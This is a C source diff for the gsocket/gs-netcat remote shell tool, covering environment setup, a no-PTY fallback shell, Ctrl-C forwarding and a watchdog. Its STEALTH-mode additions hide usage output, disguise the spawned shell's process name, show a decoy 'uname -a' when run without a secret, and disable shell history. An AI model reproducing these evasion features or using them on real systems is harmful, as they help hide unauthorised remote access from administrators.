@@ -7,7 +7,6 @@
 
 extern char **environ;
 
-
 /*
  * Add list of argv's from GSOCKET_ARGS to argv[]
  * result: argv[0] + GSOCKET_ARGS + argv[1..n]
@@ -15,7 +14,9 @@ extern char **environ;
 static void
 add_env_argv(int *argcptr, char **argvptr[])
 {
-	char *str_orig = getenv("GSOCKET_ARGS");
+	char *str_orig = GS_getenv("GSOCKET_ARGS");
+	if (str_orig == NULL)
+		str_orig = GS_getenv("GS_ARGS");
 	char *str = NULL;
 	char *next;
 	char **newargv = NULL;
@@ -75,10 +76,28 @@ add_env_argv(int *argcptr, char **argvptr[])
 void
 init_defaults(int *argcptr, char **argvptr[])
 {
+#ifdef DEBUG
+	gopt.is_built_debug = 1;
+#endif
 	gopt.log_fp = stderr;
 	gopt.err_fp = stderr;
 	signal(SIGPIPE, SIG_IGN);
 	signal(SIGCHLD, SIG_IGN);	// no defunct childs please
+	gopt.prg_name = NULL;
+	if (argvptr != NULL)
+	{
+		gopt.prg_name = *argvptr[0];
+
+		if ((gopt.prg_name != NULL) && (gopt.prg_name[0] == '/'))
+		{
+			char *ptr;
+			ptr = strrchr(gopt.prg_name, '/');
+			if (ptr != NULL)
+				gopt.prg_name = ptr + 1;
+		}
+		if (gopt.prg_name != NULL)
+			gopt.prg_name = strdup(gopt.prg_name);
+	}
 
 	/* MacOS process limit is 256 which makes Socks-Proxie yield...*/
 	struct rlimit rlim;
@@ -94,6 +113,8 @@ init_defaults(int *argcptr, char **argvptr[])
 	}
 
 	add_env_argv(argcptr, argvptr);
+
+	gopt.app_keepalive_sec = GS_APP_KEEPALIVE;
 }
 
 GS *
@@ -139,9 +160,6 @@ cb_gs_log(struct _gs_log_info *l)
 	if (l == NULL)
 		return;
 
-	if (gopt.is_quiet)
-		return;
-
 	// DEBUGF_Y("my level=%d, msg level=%d\n", gopt.verbosity, l->level);
 #ifndef DEBUG
 	// Return if this is _NOT_ a DEBUG-build but we get a TYPE_DEBUG
@@ -202,19 +220,45 @@ init_vars(void)
 
 	// Prevent startup messages if gs-netcat is started as sub-system from
 	// gs-sftp or gs-mount
-	int is_greetings = 1;
-	if (getenv("GSOCKET_NO_GREETINGS") != NULL)
-		is_greetings = 0;
+	gopt.is_greetings = 1;
+	if (GS_getenv("GSOCKET_NO_GREETINGS") != NULL)
+		gopt.is_greetings = 0;
 
-	char *str = getenv("GSOCKET_ARGS");
-	if ((str != NULL) && (strlen(str) > 0) && (is_greetings))
-		GS_LOG_V("=Extra arguments: '%s'\n", str);
+	char *gs_args = GS_getenv("GSOCKET_ARGS");
+	if (gs_args == NULL)
+		gs_args = GS_getenv("GS_ARGS");
+
+	int is_sec_by_prompt = 0;
+	if ((gopt.sec_file == NULL) && (gopt.sec_str == NULL))
+		is_sec_by_prompt = 1;
+
+#ifdef STEALTH
+	// No "=Secret   :" if GS_ARGS is set as we assume secret is passed
+	// by GS_ARGS (and thus known to user)
+	if (gs_args != NULL)
+		gopt.is_greetings = 0;
+
+	// do not allow execution without supplied secret.
+	if (gs_args == NULL)
+	{
+		if (is_sec_by_prompt)
+		{
+			system("uname -a");
+			exit(0);
+		}
+	}
+#endif
+	if (gs_args != NULL)
+		GS_LOG_V("=Extra arguments: '%s'\n", gs_args);
+
+	if ((gopt.is_quiet) && (!is_sec_by_prompt))
+		gopt.is_greetings = 0;
 
 	gopt.sec_str = GS_user_secret(&gopt.gs_ctx, gopt.sec_file, gopt.sec_str);
 	if (gopt.sec_str == NULL)
 		ERREXIT("%s\n", GS_CTX_strerror(&gopt.gs_ctx));
 
-	if (is_greetings)
+	if (gopt.is_greetings)
 		GS_LOG("=Secret         : %s\n", gopt.sec_str);
 
 	/* Convert a secret string to an address */
@@ -228,8 +272,9 @@ init_vars(void)
 void
 usage(const char *params)
 {
-	fprintf(stderr, "%s [0x%lxL] (GS v%s)\n", OPENSSL_VERSION_TEXT, OPENSSL_VERSION_NUMBER, PACKAGE_VERSION);
+	fprintf(stderr, "Version %s%s, %s %s [%s]\n", PACKAGE_VERSION, gopt.is_built_debug?"#debug":"", __DATE__, __TIME__, OPENSSL_VERSION_TEXT);
 
+#ifndef STEALTH
 	while (*params)
 	{
 		switch (params[0])
@@ -271,12 +316,13 @@ usage(const char *params)
 				fprintf(stderr, "  -C           Disable encryption\n");
 				break;
 			case 'T':
-				fprintf(stderr, "  -T           Use TOR.\n");
+				fprintf(stderr, "  -T           Use TOR or any Socks proxy (See gs-netcat(1))\n");
 				break;
 		}
 
 		params++;
 	}
+#endif // !STEALTH
 }
 
 static void
@@ -363,15 +409,18 @@ do_getopt(int argc, char *argv[])
 				printf("%s\n", GS_gen_secret());
 				fflush(stdout);
 				exit(0);
+#ifndef STEALTH
 			case '3':
 				if (strcmp(optarg, "1337") == 0)
 					GS_LOG("!!Greets to 0xD1G, xaitax and the rest of https://t.me/thcorg!!\n");
+#endif
 		}
 	}
 }
 
 static struct termios tios_saved;
 static int is_stty_raw;
+static int is_stty_nopty;
 /*
  * Client only: Save TTY state and set raw mode.
  */
@@ -392,7 +441,7 @@ stty_set_raw(void)
     	return;
     memcpy(&tios_saved, &tios, sizeof tios_saved);
     // -----BEGIN ORIG-----
- //    tios.c_iflag &= ~(BRKINT | ICRNL | INPCK | ISTRIP | IXON);
+	// tios.c_iflag &= ~(BRKINT | ICRNL | INPCK | ISTRIP | IXON);
 	// tios.c_oflag &= ~(OPOST);
 	// tios.c_lflag &= ~(ECHO | ICANON | IEXTEN | ISIG);
 	// tios.c_cflag |= (CS8);
@@ -424,6 +473,35 @@ stty_set_raw(void)
     is_stty_raw = 1;
 }
 
+// Switch from RAW to NO-PTY
+// Called when server could not allocated PTY and goes into 
+// dump terminal mode.
+void
+stty_switch_nopty(void)
+{
+	if (is_stty_nopty != 0)
+		return;
+
+	if (is_stty_raw == 0)
+		DEBUGF_R("ERROR: switch_nopty() while stty is not raw\n");
+
+	if (!isatty(STDIN_FILENO))
+		return;
+
+	// Use print as this must always go out to stdin (never log file) as the \r\n
+	// make the terminal look less messed up when bash reports bad ioctl.
+	printf("\r=No PTY on remote. Using dump terminal instead.\r\n");
+	int ret;
+    struct termios tios;
+    ret = tcgetattr(STDIN_FILENO, &tios);
+    if (ret != 0)
+    	return;
+    tios.c_oflag |= OPOST;
+    tcsetattr(STDIN_FILENO, TCSADRAIN, &tios);
+
+    is_stty_nopty = 1;
+}
+
 /*
  * Restore TTY state
  */
@@ -434,6 +512,7 @@ stty_reset(void)
 		return;
 
 	is_stty_raw = 0;
+	is_stty_nopty = 0;
 	DEBUGF_G("resetting TTY\n");
     tcsetattr(STDIN_FILENO, TCSADRAIN, &tios_saved);
 }
@@ -465,28 +544,111 @@ stty_check_esc(GS *gs, char c)
 		esc_pos = 1;
 }
 
+// Try our best to send a SIGINT to the foreground process of the
+// specified pid (bash).
+// This is used when no PTY is available and the client sends a CTRL-C.
+// Hack: Just send it to the last child that the pid spawned. This
+// may be a background process (sleep 31337 &). Ideally we should check
+// if the last process is a foreground process.
+void
+ctrl_c_child(pid_t pid)
+{
+	char buf[1024];
+	char *ptr;
+	char *end;
+	FILE *fp;
+
+	DEBUGF_Y("Ctrl-c child(%d)'s children\n", pid);
+	snprintf(buf, sizeof buf, "/proc/%d/task/%d/children", pid, pid);
+	fp = fopen(buf, "r");
+	if (fp == NULL)
+	{
+		DEBUGF_M("fopen(%s) failed\n", buf);
+		return;
+	}
+	ptr = fgets(buf, sizeof buf, fp);
+	fclose(fp);
+
+	if (ptr != NULL)
+	{
+		end = ptr + strlen(ptr);
+		while (ptr < end)
+		{
+			end--;
+			if (*end != ' ')
+				break;
+			*end = 0;
+		}
+	}
+
+	if ((ptr == NULL) || (ptr >= end))
+	{
+		// SIGINT to bash to clear command line
+		kill(pid, SIGINT);
+		return;
+	}
+
+	// Get last PID in file and hope that's the foreground process
+	ptr = strrchr(buf, ' ');
+	if (ptr == NULL)
+		ptr = buf;  // Only 1 PID in there
+
+	int child = atoi(ptr);
+	if (child <= 0)
+	{
+		DEBUGF_R("children entry not valid: %s\n", ptr);
+		return;
+	}
+
+	// Send to process entire process group
+	pid_t pgrp = getpgid(child);
+	kill(-pgrp, SIGINT);
+}
+
+
 /*
- * Return SHELL and shell name (/bin/bash , -bash)
+ * Return SHELL, shell name (/bin/bash , -bash) and prgname (procps)
  */
 static const char *
-mk_shellname(char *shell_name, ssize_t len)
+mk_shellname(const char *shell, char *shell_name, ssize_t len, const char **prgname)
 {
-	const char *shell = getenv("SHELL");
-	if ((shell == NULL) || (strlen(shell) == 0))
+	char *dfl_shell = "/bin/sh";
+	struct stat sb;
+	if (stat("/bin/bash", &sb) == 0)
+		dfl_shell = "/bin/bash";
+	else if (stat("/usr/bin/bash", &sb) == 0)
+		dfl_shell = "/usr/bin/bash";
+
+	if (shell != NULL)
 	{
-		shell = "/bin/sh";	// default
-		/* Try /bin/bash if available */
-		struct stat sb;
-		if (stat("/bin/bash", &sb) == 0)
-			shell = "/bin/bash";
+		// DO not use /bin/sh if /bin/bash is around
+		if ((strcmp(shell, "sh") == 0) || (strcmp(shell, "/bin/sh") == 0))
+			shell = NULL; 
 	}
+	if (shell == NULL)
+		shell = dfl_shell;
+
 	char *ptr = strrchr(shell, '/');
 	if (ptr == NULL)
 	{
-		shell = "/bin/sh";
-		ptr = "/sh";
+		// SHELL= is not an absolute path. Perhaps just 'zsh' or 'bash'
+		// Find the absolute path
+		shell = dfl_shell;
+		char buf[32];
+		snprintf(buf, sizeof buf, "/bin/%s", shell);
+		if (stat(buf, &sb) == 0)
+			shell = strdup(buf);
+		ptr = strrchr(shell, '/');
 	}
-	snprintf(shell_name, len, "-%s", ptr + 1);
+	ptr += 1;
+#ifdef STEALTH
+	*prgname = gopt.prg_name;
+	if (gopt.prg_name != NULL)
+		*prgname = gopt.prg_name;
+#else
+	*prgname = shell_name;
+	snprintf(shell_name, len, "-%s", ptr);
+#endif
 
 	return shell;
 }
@@ -501,86 +663,86 @@ mk_shellname(char *shell_name, ssize_t len)
  * If blacklist and addlist contain the same variable then that variable
  * will be replaced with the one from addlist.
  */
-char **
-mk_env(char **blacklist, char **addlist)
-{
-	char **env;
-	int total = 0;
-	int add_total = 0;
-	int i;
-	char *end;
-	int n;
+// char **
+// mk_env(char **blacklist, char **addlist)
+// {
+// 	char **env;
+// 	int total = 0;
+// 	int add_total = 0;
+// 	int i;
+// 	char *end;
+// 	int n;
 
-	for (i = 0; environ[i] != NULL; i++)
-		total++;
+// 	for (i = 0; environ[i] != NULL; i++)
+// 		total++;
 
-	for (i = 0; addlist[i] != NULL; i++)
-		add_total++;
+// 	for (i = 0; addlist[i] != NULL; i++)
+// 		add_total++;
 
-	// DEBUGF("Number of environment variables: %d (calloc(%d, %zu)\n", total, total + 1, sizeof *env);
-	env = calloc(total + add_total + 1, sizeof *env);
+// 	// DEBUGF("Number of environment variables: %d (calloc(%d, %zu)\n", total, total + 1, sizeof *env);
+// 	env = calloc(total + add_total + 1, sizeof *env);
 
-	/* Copy to env unless variable is in blacklist */
-	int ii = 0;
-	for (i = 0; i < total; i++)
-	{
-		char *s = environ[i];
+// 	/* Copy to env unless variable is in blacklist */
+// 	int ii = 0;
+// 	for (i = 0; i < total; i++)
+// 	{
+// 		char *s = environ[i];
 
-		/* Check if we want this env variable and continue if not */
-		end = strchr(s, '=');
-		if (end == NULL)
-			continue;			// Illegal enviornment variable
-		/* Check if the env is in the BLACK list */
-		char **b = blacklist;
-		for (; *b != NULL; b++)
-		{
-			if (end - s > strlen(*b))
-				continue;
-			if (memcmp(s, *b, end - s) == 0)
-				break;			// In the blacklist
-		}
-		if (*b != NULL)
-			continue;			// Skip if in blacklist
+// 		/* Check if we want this env variable and continue if not */
+// 		end = strchr(s, '=');
+// 		if (end == NULL)
+// 			continue;			// Illegal enviornment variable
+// 		/* Check if the env is in the BLACK list */
+// 		char **b = blacklist;
+// 		for (; *b != NULL; b++)
+// 		{
+// 			if (end - s > strlen(*b))
+// 				continue;
+// 			if (memcmp(s, *b, end - s) == 0)
+// 				break;			// In the blacklist
+// 		}
+// 		if (*b != NULL)
+// 			continue;			// Skip if in blacklist
 
-		env[ii] = strdup(s);
-		ii++;
-	}
+// 		env[ii] = strdup(s);
+// 		ii++;
+// 	}
 
-	/* Append to env unless variable is already in env */
-	int env_len = ii;
-	int should_add;
-	for (n = 0; addlist[n] != NULL; n++)
-	{
-		char *al_end = strchr(addlist[n], '=');
-		if (al_end == NULL)
-			continue;
+// 	/* Append to env unless variable is already in env */
+// 	int env_len = ii;
+// 	int should_add;
+// 	for (n = 0; addlist[n] != NULL; n++)
+// 	{
+// 		char *al_end = strchr(addlist[n], '=');
+// 		if (al_end == NULL)
+// 			continue;
 
-		should_add = 1;
-		for (i = 0; i < env_len; i++)
-		{
-			char *s = env[i];
-			end = strchr(s, '=');
-			if (end == NULL)
-				continue;
-			if (al_end - addlist[n] != end - s)
-				continue;
-			if (memcmp(s, addlist[n], end - s) == 0)
-			{
-				should_add = 0;
-				break;	// Already in this list
-			}
-		}
-		if (should_add != 0)
-		{
-			// DEBUGF_C("Adding %s\n", addlist[n]);
-			env[ii] = strdup(addlist[n]);
-			ii++;
-		}
+// 		should_add = 1;
+// 		for (i = 0; i < env_len; i++)
+// 		{
+// 			char *s = env[i];
+// 			end = strchr(s, '=');
+// 			if (end == NULL)
+// 				continue;
+// 			if (al_end - addlist[n] != end - s)
+// 				continue;
+// 			if (memcmp(s, addlist[n], end - s) == 0)
+// 			{
+// 				should_add = 0;
+// 				break;	// Already in this list
+// 			}
+// 		}
+// 		if (should_add != 0)
+// 		{
+// 			// DEBUGF_C("Adding %s\n", addlist[n]);
+// 			env[ii] = strdup(addlist[n]);
+// 			ii++;
+// 		}
 
-	}
+// 	}
 
-	return env;
-}
+// 	return env;
+// }
 
 static void
 setup_cmd_child(int except_fd)
@@ -653,7 +815,7 @@ forkpty(int *fd, void *a, void *b, void *c)
 	switch (pid)
 	{
 		case -1:
-			return -1;
+			return -2;
 		case 0:
 			/* CHILD */
 		#ifdef TIOCNOTTY
@@ -673,63 +835,144 @@ forkpty(int *fd, void *a, void *b, void *c)
 			return pid;
 	}
 
-	return -1; // NOT REACHED
+	return -3; // NOT REACHED
 }
 #endif /* HAVE_FORKPTY */
 
-int
-pty_cmd(const char *cmd, pid_t *pidptr)
+static pid_t
+forkfd(int *fd)
+{
+	int fds[2];
+	int ret;
+	pid_t pid;
+
+	ret = socketpair(AF_UNIX, SOCK_STREAM, 0, fds);
+	if (ret != 0)
+		return -1;
+
+	pid = fork();
+	if (pid < 0)
+		return pid;
+
+	if (pid == 0)
+	{
+		// Put this child into its group.
+		// Otherwise keypress 'Ctrl-C' on the server would not
+		// send SIGINT to the server but to the forked child() (bash).
+		setsid();
+
+		dup2(fds[0], STDOUT_FILENO);
+		dup2(fds[0], STDERR_FILENO);
+		dup2(fds[0], STDIN_FILENO);
+		*fd = fds[0];
+
+		return pid;
+	}
+
+	/* HERE: Parent process */
+	close(fds[0]);
+	*fd = fds[1];
+
+	return pid;
+}
+
+static int
+pty_cmd(const char *cmd, pid_t *pidptr, int *err)
 {
 	pid_t pid;
-	int fd;
+	int fd = -1;
+	int is_nopty = 0;
 	
+	*err = 0;
 	pid = forkpty(&fd, NULL, NULL, NULL);
-	XASSERT(pid >= 0, "Error: forkpty(): %s\n", strerror(errno));
+	if (pid < 0)
+	{
+		*err = GS_FD_CMD_ERR_NOPTY;
+		is_nopty = 1;
+		// In restricted environments /dev/ptmx is not available.
+		// Drop into a dump shell (without PTY control) and
+		// emulate Ctrl-C etc. There will be dragons...
+		pid = forkfd(&fd);
+	}
+	XASSERT(pid >= 0, "Error: forkpty()=%d: %s\n", pid, strerror(errno));
 
 	if (pid == 0)
 	{
 		/* Our own forkpty() (solaris 10) returns the actual slave TTY.
-		 * We can not open /dev/tty on solaris10 and use the fd that
+		 * We can not open /dev/st on solaris10 and use the fd that
 		 * our own forkpty() returns. Any other OS needs to open
 		 * /dev/tty to get correct fd for child's tty.
 		 */
 		#ifdef HAVE_FORKPTY
-		fd = open("/dev/tty", O_NOCTTY | O_RDWR);
+		if (*err != GS_FD_CMD_ERR_NOPTY)
+		{
+			int fd_x;
+			fd_x = open("/dev/tty", O_NOCTTY | O_RDWR);
+			if (fd_x >= 0)
+				fd = fd_x;
+		}
 		#endif
 
 		/* HERE: Child */
 		setup_cmd_child(fd);
 
-		/* Find out default ENV (just in case they do not exist in current
-		 * env-variable such as when started during bootup
-		 */
-		const char *shell;		// e.g. /bin/bash
-		char shell_name[64];	// e.g. -bash
-		if (cmd != NULL)
-		{
-			shell = "/bin/sh";
-		} else {
-			shell = mk_shellname(shell_name, sizeof shell_name);
-		}
-		char shell_env[64];		// e.g. SHELL=/bin/bash
-		snprintf(shell_env, sizeof shell_env, "SHELL=%s", shell);
+		signal(SIGINT, SIG_DFL);
+		signal(SIGCHLD, SIG_DFL);
+		signal(SIGTERM, SIG_DFL);
 
-		char home_env[128];
-		snprintf(home_env, sizeof home_env, "HOME=/root");	// default
+		/* Find out default ENV (just in case they do not exist in current
+		 * env-variable such as when started during bootup.
+		 * Note: Do not use shell from /etc/passwd as this might be /bin/nologin.
+		 * Instead, use the same shell that was used when gs-netcat server got
+		 * started.
+		 */
+		const char *shell = "/bin/sh"; // default
+		char shell_name[64];	// e.g. -bash
+		const char *prg_name;
+		shell_name[0] = '\0';
+		if (cmd == NULL)
+			shell = GS_getenv("SHELL");
+		shell = mk_shellname(shell, shell_name, sizeof shell_name, &prg_name);
+
+		char buf[1024];
+		snprintf(buf, sizeof buf, "SHELL=%s", shell);
+		char *shell_env = strdup(buf);
+
+		char *user = "root";
+		char *home_env = "HOME=/root";
+		char *name_env;
+		char *logname_env;
 		struct passwd *pwd;
 		pwd = getpwuid(getuid());
 		if (pwd != NULL)
-			snprintf(home_env, sizeof home_env, "HOME=%s", pwd->pw_dir);
+		{
+			user = strdup(pwd->pw_name);
+			snprintf(buf, sizeof buf, "HOME=%s", pwd->pw_dir);
+			home_env = strdup(buf);
+		}
 
-		/* Remove some environment variables:
+		snprintf(buf, sizeof buf, "USER=%s", user);
+		name_env = strdup(buf);
+		snprintf(buf, sizeof buf, "LOGNAME=%s", user);
+		logname_env = strdup(buf);
+
+		snprintf(buf, sizeof buf, "PATH=%s", getenv("PATH")?:"/usr/bin:/bin:/usr/sbin:/sbin");
+		char *path_env = strdup(buf);
+
+		snprintf(buf, sizeof buf, "MAIL=/var/mail/%.50s", user);
+		char *mail_env = strdup(buf);
+
+		/* Start with a clean environemnt (like OpenSSH does).
 		 * STY = Confuses screen if gs-netcat is started from within screen (OSX)
 		 * GSOCKET_ARGS = Otherwise any further gs-netcat command would
 		 *    execute with same (hidden) commands as the current shell.
 		 * HISTFILE= does not work on oh-my-zsh (it sets it again)
+		 * FIXME: See OpenSSH/session.c:
+		 * 1. Read /etc/default/login
+		 * 2. Retrieve TZ, TERM, DISPLAY, LANG, LC from client.
+		 * 3. Add ~/.ssh/environment
 		 */
-		char *env_blacklist[] = {"STY", "GSOCKET_ARGS", "HISTFILE", NULL};
-		char *env_addlist[] = {shell_env, "TERM=xterm-256color", "HISTFILE=/dev/null", home_env, NULL};
-		char **envp = mk_env(env_blacklist, env_addlist);
+		char *envp[] = {path_env, shell_env, mail_env, "TERM=xterm-256color", "HISTFILE=/dev/null", "LANG=en_US.UTF-8", home_env, name_env, logname_env, NULL};
 
 		if (cmd != NULL)
 		{
@@ -737,13 +980,18 @@ pty_cmd(const char *cmd, pid_t *pidptr)
 			ERREXIT("exec(%s) failed: %s\n", cmd, strerror(errno));
 		} 
 
-		const char *args = "-il";	// bash, fish, zsh
-		if (strcmp(shell_name, "-sh") == 0)
-			args = "-i";	// solaris 10 /bin/sh does not like -l
-		if (strcmp(shell_name, "-csh") == 0)
-			execle(shell, shell_name, NULL, envp); // csh (fbsd) without any arguments
+		if (is_nopty)
+		{
+			const char *args = "-il";	// bash, fish, zsh
+			if (strcmp(shell_name, "-sh") == 0)
+				args = "-i";	// solaris 10 /bin/sh does not like -l
+			if (strcmp(shell_name, "-csh") == 0)
+				execle(shell, prg_name, NULL, envp); // csh (fbsd) without any arguments
+			execle(shell, prg_name, args, NULL, envp); // No PTY. Need '-il'.
+		}
 
-		execle(shell, shell_name, args, NULL, envp);
+		// For PTY Terminals the -il is not needed
+		execle(shell, prg_name, NULL, envp);
 		ERREXIT("execlp(%s) failed: %s\n", shell, strerror(errno));
 	}
 	/* HERE: Parent */
@@ -758,15 +1006,17 @@ pty_cmd(const char *cmd, pid_t *pidptr)
  * Spawn a cmd and return fd.
  */
 int
-fd_cmd(const char *cmd, pid_t *pidptr)
+fd_cmd(const char *cmd, pid_t *pidptr, int *err)
 {
 	pid_t pid;
 	int fds[2];
 	int ret;
 
+	*err = 0;
+
 	if (gopt.is_interactive)
 	{
-		return pty_cmd(cmd, pidptr);
+		return pty_cmd(cmd, pidptr, err);
 	}
 
 	ret = socketpair(AF_UNIX, SOCK_STREAM, 0, fds);
@@ -962,10 +1212,11 @@ fd_kernel_flush(int fd)
 void
 cmd_ping(struct _peer *p)
 {
-	if (gopt.is_want_ping != 0)
+	DEBUGF("Sending PING\n");
+	if (p->is_want_ping != 0)
 		return;
 
-	gopt.is_want_ping = 1;
+	p->is_want_ping = 1;
 	GS_SELECT_FD_SET_W(p->gs);
 }
 
@@ -1001,10 +1252,13 @@ void
 gs_watchdog(void)
 {
 	pid_t pid;
+	pid_t ppid = 0;
+	pid_t ppid_now = 0;
+	struct timeval tv;
+	struct timeval *tvptr = NULL;
 
 	while (1) // LOOP FOREVER
 	{
-
 		int fds[2];
 		socketpair(AF_UNIX, SOCK_STREAM, 0, fds);
 		pid = fork();
@@ -1020,16 +1274,25 @@ gs_watchdog(void)
 
 		// PARENT:
 		close(fds[0]);
+		ppid = getppid();
 		// fdsp[1] is a socket to the child. We can detect when it dies....
 		fd_set rfds;
-		FD_ZERO(&rfds);
 
 		int n;
 		while (1)
 		{
-			FD_SET(STDIN_FILENO, &rfds);
+			FD_ZERO(&rfds);
+			if (tvptr == NULL)
+			{
+				FD_SET(STDIN_FILENO, &rfds);
+			} else {
+				// Poll and check ppid has changed
+				XASSERT(gopt.is_internal != 0, "tvptr=%p but not internal(=%d)\n", tvptr, gopt.is_internal);
+				tv.tv_sec = 5;
+				tv.tv_usec = 0;
+			}
 			FD_SET(fds[1], &rfds);
-			n = select(fds[1] + 1, &rfds, NULL, NULL, NULL);
+			n = select(fds[1] + 1, &rfds, NULL, NULL, tvptr /* NULL unless is_internal */);
 			if (n < 0)
 			{
 				if (errno == EINTR)
@@ -1037,12 +1300,34 @@ gs_watchdog(void)
 				exit(EX_BADSELECT); // FATAL
 			}
 
-			// If parent dies then die immediately (this closes fds[0] and all child will die)
+			// Detect if the parent dies (e.g. STDIN closes).
+			// A special case is 'sshd -d': SSHD closes all 'not needed' FDs
+			// (including our IPC). We need a different way to check if
+			// parent died in addition to checking if our IPC got closed:
+			// Check if ppid has changed as well as IPC closed (parent is really dead).
 			if (FD_ISSET(STDIN_FILENO, &rfds))
 			{
-				// DEBUGF_Y("watchdog STDIN is set. EOF (parent died)?\n");
-				exit(0);
+				ppid_now = getppid();
+				DEBUGF_Y("Watchdog: EOF on STDIN. (parent=%d died or closed IPC. ppid_now=%d)?\n", ppid, ppid_now);
+				if (gopt.is_internal == 0)
+					exit(0); // NOT ./gsocket <app>
+
+				if (ppid_now < ppid)
+					exit(0);
+				close(STDIN_FILENO);
+				tvptr = &tv;
 			}
+			if (tvptr != NULL)
+			{
+				// Check if ppid has changed. Exit if it has.
+				ppid_now = getppid();
+				if (ppid_now < ppid)
+				{
+					DEBUGF_Y("Watchdog: PPID=%d changed (was %d). Parent is dead(?)\n", ppid_now, ppid);
+					exit(0);
+				}
+			}
+
 			if (FD_ISSET(fds[1], &rfds))
 			{
 				// Oops. Child died. Restart.
